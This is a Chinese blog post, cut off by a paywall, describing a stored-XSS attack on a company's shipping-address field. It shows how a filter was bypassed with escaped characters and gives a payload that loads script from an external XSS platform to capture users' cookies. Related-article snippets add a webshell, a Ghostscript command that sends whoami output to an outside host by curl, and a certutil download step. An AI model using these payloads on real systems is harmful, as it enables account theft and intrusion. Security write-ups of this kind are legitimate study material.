【渗透实例】记录一次XSS渗透过程

最新推荐文章于 2025-06-09 18:00:31 发布
最新推荐文章于 2025-06-09 18:00:31 发布
阅读量2.4k 收藏 7
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 渗透实例 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37683287/article/details/94591810
本文记录了一次XSS渗透过程,首先在目标网站的编辑收货地址处发现XSS漏洞,然后通过构造带转义字符的XSS代码成功绕过平台过滤,实现了与XSS平台的连接。虽然能获取用户Cookie等信息,但由于触发条件限制,实际利用价值有限。作者探讨了漏洞可能的其他利用价值,并欢迎读者分享想法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 找到存在XSS的位置

没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。

使用的XSS代码:<img src=1 onerror=alert(1)
#因为优快云编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。

在这里插入图片描述

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

在这里插入图片描述
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字符,利用转义字符可以绕过该平台的策略,因为经验不足,所以在这一步尝试了很多种办法都没能绕过,要不有的可以插入但是连不上XSS平台,要不有的就是被识别拦截。

最低0.47元/天 解锁文章

200万优质内容无限畅学
对某小程序的一次渗透记录
布啦啦
03-25 993
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 4147
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
渗透测试实例指南--XSS
qq_37051023的博客
07-30 264
概要:XSS--跨站脚本攻击,Cross-Site Scripting,属于代码注入攻击的一种,针对网站应用程序的安全漏洞攻击技术。它允许恶意用户将代码注入到网页,其他用户浏览器此页面时会受到影响,一旦攻击成功,则可能获取较高权限、私密网页内容、会话和cookie等内容。 XSS攻击分为三种方式:反射型XSS、存储型XSS、DOM型XSS。 反射型:攻击者利用电子邮件或其他方式将包含XSS代码的恶意链接发送给目标用户,目标用户点击或浏览此链接后,会访问到某服务器,服务器接收到请求后,将带有XSS代码的数
XSS-跨站脚本攻击(非常详细),零基础入门到精通,看这一篇就够了
最新发布
shandongjiushen的博客
06-09 692
跨站脚本攻击(xss),指攻击者通过篡改网页,嵌入恶意脚本程序,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets )的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
XSS例子
技术资料库
10-19 6383
Note from the author: XSS is Cross Site Scripting. If you dont know how XSS (Cross Site Scripting) works, this page probably wont help you. This page is for people who
记录一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 478
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
记录一次模拟渗透
0verWatch的博客
07-25 636
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
渗透测试XSS实验集合
WEL测试
12-22 1000
MCIR-XSSMH:challenge0 页面:/mcir/xssmh/challenges/challenge0.php 1、验证是否存在XSS注入:<script>alert(1)</script> 2、存在XSS注入,要求是弹出“Hello World”,调整注入内容:<script>alert("Hello, world!")</script>url如下: http://mcir.pte.com/mcir/xssmh/xss.php?locati
第04篇:XSS三重URL编码绕过实例1
08-03
这表明服务器端可能在接收参数后,不仅解码了一次URL,还将其直接输出到HTML中。 攻击者抓住了这个逻辑错误,通过进行三重URL编码(%252522),成功绕过了服务器的防御,使得双引号被正确解析并闭合了HTML标签,...
XSS漏洞——渗透day08
qq_62716256的博客
09-04 680
XSS漏洞——渗透day08
记录一次渗透测试全过程
weixin_30730151的博客
12-18 652
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
【萌新】记录一次渗透小站的过程
Leep0rt的博客
09-07 1058
一开始接触该站 先随便翻阅了一些目录 发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目 于是 二话不说 看看有没有注入点 输入一个  '  看一看  发现报错了!!! 然后惯例 and 1=1, and 1=11 发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧! 云锁s
记录一次渗透的思路
派大李的博客
11-26 347
信息收集就略过了。。。 尝试弱口令成功进入后台。。 弱口令简直就是 0day啊!!! 后台界面。。 进到后台就要getshell,找到上传点,burp改包成功上传冰蝎 拼接url地址访问 成功连接,环境是phpstudy搭建的,windows2012的服务器 系统函数都被禁用,执行不了命令,突破: phpstudy搭建的环境权限都很大,可以跨目录,直接修改php.ini配置文件 成功执行命令:whoami 是个管理员权限,接下来就是重头戏了,本人在这里翻车了。。。 提权试了许多方法,奈何我太
记录一次web渗透测试
m0_47421272的博客
01-07 3009
** 刚学web渗透2个月 第一次实战。 ** 渗透利用的工具: 1.dirb 2.nmap 开始 朋友发给我一个链接,点进去看是一个后台 尝试弱口令登录.(user:admin pass:admin) 非常幸运,登录进了后台。 找上传点上传webshell。 这里上传没有格式限制。 上传webshell。可以上传成功。 右键复制链接地址。 使用weevely连接。 发现后缀没显示,应该过滤掉了,本人比较懒,webshell上传失败了。 那就使用dirb扫描该站点目录,看看有没有敏感目录。
一次xss挑战
weixin_33862514的博客
01-22 158
2019独角兽企业重金招聘Python工程师标准>>> ...
一次XSS攻击绕过
zkaqlaoniao的博客
10-27 1147
最近一直在看国外的赏金平台,绕waf是真的难受, 记录一下绕过的场景。
渗透测试实例指南--XSS进阶
qq_37051023的博客
11-02 353
1、XSS构造方法 1.1 利用<>构造HTML标签和<script> 例如:<script>alert(/xss/)</script> <script>confirm("完成的不错!")</script> <script>prompt("完成的不错!")</script> <scr...
实战渗透--一次对后台登录系统的简单渗透测试
tzyyyyyy的博客
11-25 5654
记录一次网页后台登录系统的渗透测试实战 拿到目标后台的管理员登录密码 以管理员身份进入后台
"Web安全服务渗透测试报告模板与实例说明
Web安全服务渗透测试报告是对一个门户网站进行渗透测试后的全面分析报告,旨在评估该网站的安全性能并提供相应的改进建议。本报告使用了模板.docx,并按照通用的渗透测试报告结构进行撰写。 摘要部分对整个报告进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值